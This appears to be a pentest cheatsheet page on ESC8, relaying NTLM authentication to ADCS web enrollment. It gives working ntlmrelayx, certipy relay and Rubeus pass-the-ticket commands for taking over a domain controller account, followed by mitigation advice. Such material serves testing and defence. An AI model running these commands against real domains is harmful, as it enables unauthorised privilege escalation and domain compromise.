Esc8
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
ESC8 (NTLM Relay to ADCS Web Enrollment) attacks relay captured NTLM authentication requests to the ADCS Web Enrollment endpoints. If the relayed authentication has sufficient privileges, the attacker can enroll a certificate for the relayed account.
This attack enables privilege escalation by relaying from a compromised machine to the CA server's certificate enrollment endpoint.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Esc8:
impacket-ntlmrelayx -t http://CA.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainControllerpython3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcsRubeus.exe asktgt /user:DC$ /certificate:dc.pfx /pttcertipy relay -ca <ca-server> -template DomainControllerTools & Techniques
Recommended tools for Esc8:
- Impacket ntlmrelayx: NTLM relay with ADCS module
- Certipy relay: relay-to-ADCS tool
- Rubeus: use enrolled certificate for TGT request
- Requires: network access to ADCS enrollment endpoint
Prevention & Mitigation
Security recommendations to prevent Esc8:
- Disable NTLM authentication on ADCS servers if possible
- Enable Extended Protection for Authentication (EPA) on ADCS
- Place ADCS servers in a protected network segment
- Use HTTPS with channel binding for ADCS endpoints
- Disable HTTP enrollment endpoints, use HTTPS only
References
Additional resources: